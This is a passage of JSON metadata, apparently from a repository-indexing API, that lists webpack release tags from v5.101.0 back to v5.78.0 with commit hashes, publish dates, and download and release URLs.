.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpac